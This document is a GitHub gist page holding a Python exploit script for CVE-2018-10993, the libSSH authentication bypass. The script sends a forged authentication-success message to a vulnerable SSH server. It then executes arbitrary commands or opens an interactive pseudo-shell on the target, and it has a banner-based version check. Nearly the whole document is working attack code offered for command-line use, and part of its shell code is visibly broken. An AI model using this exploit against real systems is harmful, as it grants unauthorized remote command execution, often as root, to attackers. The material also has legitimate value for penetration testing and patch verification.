Skip to content

Instantly share code, notes, and snippets.

@jam620
Forked from mgeeky/cve-2018-10993.py
Created August 1, 2019 04:01
Show Gist options
  • Select an option

  • Save jam620/599b33e3a7698c9570d13ccef482dcc0 to your computer and use it in GitHub Desktop.

Select an option

Save jam620/599b33e3a7698c9570d13ccef482dcc0 to your computer and use it in GitHub Desktop.

Revisions

  1. @mgeeky mgeeky created this gist Dec 4, 2018.
    380 changes: 380 additions & 0 deletions cve-2018-10993.py
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,380 @@
    #!/usr/bin/python3

    #
    # CVE-2018-10993 libSSH authentication bypass exploit
    #
    # The libSSH library has flawed authentication/connection state-machine.
    # Upon receiving from connecting client the MSG_USERAUTH_SUCCESS Message
    # (as described in RFC4252, sec. 5.1.) which is an authentication response message
    # that should be returned by the server itself (not accepted from client)
    # the libSSH switches to successful post-authentication state. In such state,
    # it impersonates connecting client as server's root user and begins executing
    # delivered commands.
    # This results in opening an authenticated remote-access channel
    # without any authentication attempts (authentication bypass).
    #
    # Below exploit contains modified code taken from:
    # - https://github.com/leapsecurity/libssh-scanner
    #
    # Known issues:
    # - UnauthSSH.shell() function is not working:
    # I never got paramiko.Channel.invoke_shell() into working from custom
    # transport object. Therefore as a workaround - `UnauthSSH.parashell()` function
    # was implemented that substitutes original functionality of spawning shell.
    #
    # Requirements:
    # - paramiko
    #
    # Mariusz B. / mgeeky, <mb@binary-offensive.com>
    #

    import sys
    import socket
    import time
    import argparse
    from sys import argv, exit

    try:
    import paramiko
    except ImportError:
    print('[!] Paramiko required: python3 -m pip install paramiko')
    sys.exit(1)


    VERSION = '0.1'

    config = {
    'debug' : False,
    'verbose' : False,
    'host' : '',
    'port' : 22,
    'log' : '',
    'connection_timeout' : 5.0,
    'session_timeout' : 10.0,
    'buflen' : 4096,
    'command' : '',
    'shell' : False,
    }

    class Logger:
    @staticmethod
    def _out(x):
    if config['debug'] or config['verbose']:
    sys.stdout.write(x + '\n')

    @staticmethod
    def dbg(x):
    if config['debug']:
    sys.stdout.write('[dbg] ' + x + '\n')

    @staticmethod
    def out(x):
    Logger._out('[.] ' + x)

    @staticmethod
    def info(x):
    Logger._out('[?] ' + x)

    @staticmethod
    def err(x):
    sys.stdout.write('[!] ' + x + '\n')

    @staticmethod
    def fail(x):
    Logger._out('[-] ' + x)

    @staticmethod
    def ok(x):
    Logger._out('[+] ' + x)

    class UnauthSSH():
    def __init__(self):
    self.host = config['host']
    self.port = config['port']
    self.sock = None
    self.transport = None
    self.connectionInfoOnce = False

    def __del__(self):
    if self.sock:
    self.sock.close()

    def sshAuthBypass(self, force = False):
    if not force and (self.transport and self.transport.is_active()):
    Logger.dbg('Returning already issued SSH Transport')
    return self.transport

    self.__del__()
    self.sock = socket.socket()

    if not self.connectionInfoOnce:
    self.connectionInfoOnce = True
    Logger.info('Connecting with {}:{} ...'.format(
    self.host, self.port
    ))

    try:
    self.sock.connect((str(self.host), int(self.port)))
    Logger.ok('Connected.')
    except Exception as e:
    Logger.fail('Could not connect to {}:{} . Exception: {}'.format(
    self.host, self.port, str(e)
    ))
    sys.exit(1)

    message = paramiko.message.Message()
    message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)

    transport = paramiko.transport.Transport(self.sock)
    transport.start_client(timeout = config['connection_timeout'])
    transport._send_message(message)

    self.transport = transport
    return transport

    def NOT_WORKING_shell(self):
    # FIXME: invoke_shell() closes channel prematurely.
    transport = self.sshAuthBypass()
    session = transport.open_session(timeout = config['session_timeout'])
    session.set_combine_stdLogger.err(True)
    session.get_pty()
    session.invoke_shell()

    username = UnauthSSH._send_recv(session, 'username')
    hostname = UnauthSSH._send_recv(session, 'hostname')

    prompt = '{}@{} $ '.format(username, hostname)

    while True:
    inp = input(prompt).strip()

    if inp.lower() in ['exit', 'quit'] or not inp:
    Logger.info('Quitting...')
    break

    out = UnauthSSH._send_recv(session, inp)
    if not out:
    Logger.err('Could not constitute stable shell.')
    return

    print(out)

    def shell(self):
    self.parashell()

    def parashell(self):
    username = self.execute('whoami')
    hostname = self.execute('hostname')

    prompt = '{}@{} $ '.format(username, hostname)

    if not username or not hostname:
    Logger.fail('Could not obtain username ({}) and/or hostname ({})!'.format(
    username, hostname
    ))
    return

    Logger.info('Entering pseudo-shell...')
    while True:
    inp = input(prompt).strip()

    if inp.lower() in ['exit', 'quit'] or not inp:
    Logger.info('Quitting...')
    break

    out = self.execute(inp)
    if not out:
    Logger.err('Could not constitute stable shell.')
    return

    print(out)


    # FIXME: Not used as NOT_WORKING_shell() is bugged.
    @staticmethod
    def _send_recv(session, cmd):
    out = ''
    session.send(cmd.strip() + '\n')

    MAX_TIMEOUT = config['session_timeout']
    timeout = 0.0

    while not session.exit_status_ready():
    time.sleep(0.1)
    timeout += 0.1

    if timeout > MAX_TIMEOUT:
    return None
    if session.recv_ready():
    out += session.recv(config['buflen']).decode()

    if session.recv_stderr_ready():
    out += session.recv_stdLogger.err(config['buflen']).decode()

    while session.recv_ready():
    out += session.recv_ready(config['buflen'])

    return out

    @staticmethod
    def _exec(session, inp):
    inp = inp.strip()

    Logger.dbg('Executing command: "{}"'.format(inp))
    session.exec_command(inp + '\n')

    retcode = session.recv_exit_status()
    buf = ''

    while session.recv_ready():
    buf += session.recv(config['buflen']).decode()

    buf = buf.strip()
    Logger.dbg('Returned:\n{}'.format(buf))
    return buf

    def execute(self, cmd, printout = False, tryAgain = False):
    transport = self.sshAuthBypass(force = tryAgain)
    session = transport.open_session(timeout = config['session_timeout'])
    session.set_combine_stderr(True)

    buf = ''
    try:
    buf = UnauthSSH._exec(session, cmd)
    except paramiko.SSHException as e:
    if 'channel closed' in str(e).lower() and not tryAgain:
    return self.execute(cmd, printout, True)

    if printout and not tryAgain:
    Logger.fail('Could not execute command ({}): "{}"'.format(cmd, str(e)))
    return ''

    if printout:
    print('\n{} $ {}'.format(self.host, cmd))
    print('{}'.format(buf))

    return buf

    def exploit():
    handler = UnauthSSH()
    if config['command']:
    out = handler.execute(config['command'])
    Logger._out('\n$ {}'.format(config['command']))
    print(out)
    else:
    handler.shell()

    def collectBanner():
    ip = config['host']
    port = config['port']

    try:
    s = socket.create_connection((ip, port), timeout = config['connection_timeout'])
    Logger.ok('Connected to the target: {}:{}'.format(ip, port))
    s.settimeout(None)
    banner = s.recv(config['buflen'])
    s.close()
    return banner.split(b"\n")[0]

    except (socket.timeout, socket.error) as e:
    Logger.fail('SSH connection timeout.')
    return ""

    def check():
    global config
    if not config['command'] and not config['shell']:
    config['verbose'] = True

    banner = collectBanner()

    if banner:
    Logger.info('Obtained banner: "{}"'.format(banner.decode().strip()))

    #
    # NOTICE: The below version-checking logic was taken from:
    # - https://github.com/leapsecurity/libssh-scanner
    #

    if any(version in banner for version in [b"libssh-0.6", b"libssh_0.6"]):
    Logger.ok('Target seems to be VULNERABLE!')

    elif any(version in banner for version in [b"libssh-0.7", b"libssh_0.7"]):
    # libssh is 0.7.6 or greater (patched)
    if int(banner.split(b".")[-1]) >= 6:
    Logger.info('Target seems to be PATCHED.')
    else:
    Logger.ok('Target seems to be VULNERABLE!')
    return True

    elif any(version in banner for version in [b"libssh-0.8", b"libssh_0.8"]):
    # libssh is 0.8.4 or greater (patched)
    if int(banner.split(b".")[-1]) >= 4:
    Logger.info('Target seems to be PATCHED.')
    else:
    Logger.ok('Target seems to be VULNERABLE!')
    return True

    else:
    Logger.fail('Target is not vulnerable.')

    else:
    Logger.err('Could not obtain SSH service banner.')

    return False

    def parse_opts():
    global config

    parser = argparse.ArgumentParser(description = 'If there was neither shell nor command option specified - exploit will switch to detect mode yielding vulnerable/not vulnerable flag.')
    parser.add_argument('host', help='Hostname/IP address that is running vulnerable libSSH server.')
    parser.add_argument('-p', '--port', help='libSSH port', default = 22)
    parser.add_argument('-s', '--shell', help='Exploit the vulnerability and spawn pseudo-shell', action='store_true', default = False)
    parser.add_argument('-c', '--command', help='Execute single command. ', default='')
    parser.add_argument('--logfile', help='Logfile to write paramiko connection logs', default = "")

    parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
    parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')

    args = parser.parse_args()

    try:
    config['host'] = args.host
    config['port'] = args.port
    config['log'] = args.logfile
    config['command'] = args.command
    config['shell'] = args.shell
    config['verbose'] = args.verbose
    config['debug'] = args.debug

    if args.shell and args.command:
    Logger.err('Shell and command options are mutually exclusive!\n')
    raise Exception()

    except:
    parser.print_help()
    return False

    return True

    def main():
    sys.stderr.write('''
    :: CVE-2018-10993 libSSH authentication bypass exploit.
    Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
    Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
    v{}
    '''.format(VERSION))
    if not parse_opts():
    return False

    if config['log']:
    paramiko.util.log_to_file(config['log'])

    check()

    if config['command'] or config['shell']:
    exploit()

    if __name__ == '__main__':
    main()